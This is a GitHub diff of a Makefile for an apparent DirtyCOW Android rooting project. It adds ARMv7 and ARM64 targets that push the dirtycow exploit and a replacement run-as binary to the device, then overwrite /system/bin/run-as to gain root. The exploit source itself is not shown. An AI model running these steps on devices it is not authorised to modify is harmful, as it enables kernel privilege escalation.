File tree Expand file tree Collapse file tree 1 file changed +14
-2
lines changed Expand file tree Collapse file tree 1 file changed +14
-2
lines changed Original file line number Diff line number Diff line change @@ -8,10 +8,22 @@ push: build
8
8
adb push libs/armeabi/dirtycow /data/local/tmp/dirtycow
9
9
adb push libs/armeabi/run-as /data/local/tmp/run-as
10
10
11
- root : push
11
+ push-arm7 : build
12
+ adb push libs/armeabi-v7a/dirtycow /data/local/tmp/dirtycow
13
+ adb push libs/armeabi-v7a/run-as /data/local/tmp/run-as
14
+
15
+ push-arm8 : build
16
+ adb push libs/arm64-v8a/dirtycow /data/local/tmp/dirtycow
17
+ adb push libs/arm64-v8a/run-as /data/local/tmp/run-as
18
+
19
+ run :
12
20
adb shell ' chmod 777 /data/local/tmp/run-as'
13
21
adb shell ' /data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as'
14
- adb shell /system/bin/run-as
22
+ adb shell /system/bin/run-as
23
+
24
+ root : push run
25
+ root-arm7 : push-arm7 run
26
+ root-arm8 : push-arm8 run
15
27
16
28
clean :
17
29
rm -rf libs
You can’t perform that action at this time.
0 commit comments